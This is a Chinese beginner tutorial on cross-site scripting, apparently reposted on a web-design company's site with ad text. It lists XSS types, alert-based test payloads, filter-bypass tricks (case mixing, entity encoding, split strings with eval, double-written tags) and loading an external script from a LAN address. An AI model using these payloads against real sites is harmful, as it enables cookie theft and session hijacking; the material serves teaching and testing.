XSS漏洞基礎(chǔ)知識(shí)有哪些，很多新手對(duì)此不是很清楚，為了幫助大家解決這個(gè)難題，下面小編將為大家詳細(xì)講解，有這方面需求的人可以來學(xué)習(xí)下，希望你能有所收獲。

10年積累的成都網(wǎng)站設(shè)計(jì)、成都網(wǎng)站制作、外貿(mào)網(wǎng)站建設(shè)經(jīng)驗(yàn)，可以快速應(yīng)對(duì)客戶對(duì)網(wǎng)站的新想法和需求。提供各種問題對(duì)應(yīng)的解決方案。讓選擇我們的客戶得到更好、更有力的網(wǎng)絡(luò)服務(wù)。我雖然不認(rèn)識(shí)你，你也不認(rèn)識(shí)我。但先做網(wǎng)站設(shè)計(jì)后付款的網(wǎng)站建設(shè)流程，更有密云免費(fèi)網(wǎng)站建設(shè)讓你可以放心的選擇與我們合作。

一、XSS漏洞危害

1、盜取各種用戶賬號(hào)

2、竊取用戶cookie

3、劫持用戶會(huì)話

4、刷流量，執(zhí)行彈窗

二、漏洞驗(yàn)證

1、在登錄框輸入下面代碼,點(diǎn)擊登錄

<script>alert(123)</script>

2、彈出對(duì)話框，說明存在xss漏洞

三、漏洞分類

1、反射型

只能利用一次，必須構(gòu)造特殊的連接讓目標(biāo)點(diǎn)擊，比如上面的登錄界面。

2、存儲(chǔ)型

將特殊語句存儲(chǔ)到頁面，只要目標(biāo)瀏覽該網(wǎng)頁，就會(huì)被攻擊，比如留言板。

3、DOM型

不與服務(wù)器進(jìn)行交互，利用在本地渲染網(wǎng)頁時(shí)觸發(fā)

四、payload構(gòu)造

偽協(xié)議

<a href="javascript:alert(123)">aiyou</a>

事件

<img src="./1.jpg" onmouseover='alert(123)'><img src="#" onerror='alert(123)'><input type="text" onkeydown="alert(123)"><input type="button" onclick="alert(123)"><div style="width:expression(alert(xss))">

五、繞過防護(hù)

1、大小寫繞過

<SCript>alert(123)</SCript>

2、引號(hào)的使用

<img src="#" onerror="alert(123)"/><img src='#' onerror='alert(123)'/><img src=# onerror=alert(123) />

3、“/”代替空格

<img/src='#'/Onerror='alert(123)'>

4、對(duì)標(biāo)簽屬性值轉(zhuǎn)碼

字母    ASCII  十進(jìn)制編碼  十六進(jìn)制編碼

a        97         a        a

<a href="j&#97;v&#x61script:alert(123)">aiyou</a>

5、頭插入尾插入

<a href="&#01;j&#97;v&#x61script:alert(123)&#02;">aiyou</a>

6、拆分

<script>z='alert'</script><script>z=z+'(123)'</script><script>eval(z)</script>

7、雙寫繞過

<scrscriptipt>alert(123)</scscriptript>

六、外部調(diào)用

1、新建一個(gè)xss.js，內(nèi)容為

alert(213);

2、構(gòu)建paylaod,提交

<script src="http://192.168.1.129/js/xss.js"></script>

看完上述內(nèi)容是否對(duì)您有幫助呢？如果還想對(duì)相關(guān)知識(shí)有進(jìn)一步的了解或閱讀更多相關(guān)文章，請(qǐng)關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道，感謝您對(duì)創(chuàng)新互聯(lián)的支持。

文章標(biāo)題：XSS漏洞基礎(chǔ)知識(shí)有哪些
文章來源：http://jinyejixie.com/article4/gpsdoe.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供響應(yīng)式網(wǎng)站、自適應(yīng)網(wǎng)站、虛擬主機(jī)、定制開發(fā)、手機(jī)網(wǎng)站建設(shè)、網(wǎng)站制作

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來源： 創(chuàng)新互聯(lián)